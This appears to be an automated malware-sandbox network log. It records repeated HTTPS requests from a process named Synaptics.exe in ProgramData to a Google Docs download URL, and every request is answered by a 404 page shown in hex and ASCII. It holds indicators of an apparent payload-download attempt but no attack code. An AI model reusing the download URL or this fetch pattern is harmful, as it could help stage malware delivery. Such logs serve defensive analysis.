                                                                                                                                                                                        2022-05-17 11:31:42 UTC314INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 63 31 67 42 65 4a 6f 62 34 73 56 62 72 41 51 66 38 39 76 4a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7c1gBeJob4sVbrAQf89vJQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:42 UTC315INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:42 UTC315INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        103192.168.2.349858142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:42 UTC312OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:42 UTC315INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:42 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-FXTL+mQQg+If4qpXWREhzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:42 UTC317INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 2f 75 45 46 48 4c 65 4e 51 52 76 6c 4e 67 54 76 35 4c 58 59 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="A/uEFHLeNQRvlNgTv5LXYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:42 UTC318INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:42 UTC318INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        104192.168.2.349860142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:42 UTC315OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:42 UTC319INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:42 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-oznWNb7Jt/q1G6Z8ux//yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:42 UTC320INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 76 33 38 61 49 72 32 44 69 6f 75 79 35 57 45 73 46 64 65 4c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Cv38aIr2Diouy5WEsFdeLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:42 UTC322INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:42 UTC322INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        105192.168.2.349861142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:42 UTC318OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:42 UTC322INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:42 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-EWDp7uW25uVg710xb+5V5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:42 UTC323INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:42 UTC323INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 6e 78 4e 48 55 31 34 46 66 37 7a 54 4c 6a 2b 32 2f 48 6f 4d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EnxNHU14Ff7zTLj+2/HoMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:42 UTC324INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:42 UTC325INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        106192.168.2.349863142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:42 UTC325OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:42 UTC325INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:42 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-GTCyW95/+Khfn0E2RoDPDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:42 UTC326INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2f 37 66 2b 52 6b 42 68 4b 45 36 45 2f 69 66 42 42 42 66 50 49 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/7f+RkBhKE6E/ifBBBfPIA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:42 UTC328INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:42 UTC328INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        107192.168.2.349864142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:42 UTC325OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:43 UTC328INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:43 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-EDercS37ISxPN8iy/C9ZfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:43 UTC329INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:43 UTC329INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 67 47 61 4e 35 37 2f 52 72 69 42 4a 45 33 75 48 51 77 71 6e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
